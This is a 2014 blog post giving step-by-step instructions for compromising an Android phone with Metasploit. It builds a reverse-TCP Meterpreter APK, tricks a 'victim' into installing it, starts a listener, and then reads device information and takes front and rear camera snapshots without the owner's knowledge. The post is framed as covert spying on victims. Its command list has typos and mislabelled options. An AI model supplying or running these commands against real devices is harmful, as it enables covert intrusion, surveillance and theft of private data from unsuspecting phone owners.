Tuesday 16 December 2014

// // 1 comment

HOW TO HACK ANDROID SMARTPHONE USING METASPLOIT


Hello Guys ,I will show you how to exploit any android phone through metasploit.  Ex. You can take and access victim files and all info like as mobile info, snapshot form his/her camera and many more without the knowledge of the person who is using it.

Follow these steps to hack android phone. Pre Requirement to done this process


  • Victim Android Phone (version must be greater than 2.2)
  • Kali Linux or backtrack 5 (Metasplot framework)
  • VMware workstation
  • Both the devices should be in same network, If not then we will use port forwarding.

STEP -1 Firstly open the vmware work station.

STEP -2 Switch or open on your kali/backtrack virtual machine.

STEP -3 Open command Terminal!

STEP -4 Before we start at first we have to make a bridge connection of our external ip address with the internal VMware IP address, for that do the following

  • Click on VM on the file menu
  •  Go to removable devices
  • Click on network adapter
  • Click on settings

STEP -5 Click on network adapter then under the network connection choose the Bridge radial button.





STEP -6 Now Use the following commands

  1.  Ifconfig (To check the internal ip address.
  2. Change the current directory with the desktop
  3. Use this command to make the apk file which we have to upload later on, on the victim’s mobile phone.
  4.  msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 R > androhack.apk
  5. Open msfconsle
  6. Enter below command
  7.  Use exploit/multi/handler
  8.  Set Payload
  9. Set payload android/meterpreter/reverse_tcp
  10. Show options to see the LHOST and LPORT
  11.  Set Lport to 192.168.1.7 which is I.P address of my Virtual machine which I got by typing the IFCONFIG command, here you have to write your i.p address,
  12.  Set LPORT to 4444 which is our listening port.
  13. Type exploit  (To connect with the Victim’s mobile)
  14. Type help (to see all the command which you can execute on victim’s
  15. mobile)
  16. Type sysinfo (To check the system information of the victim’s mobile)
  17.  Type wecam_snap – I 2 (To take the front cam shot)
  18. Type wecam_snap – I 1 (To take the rear  cam shot)

 















Read More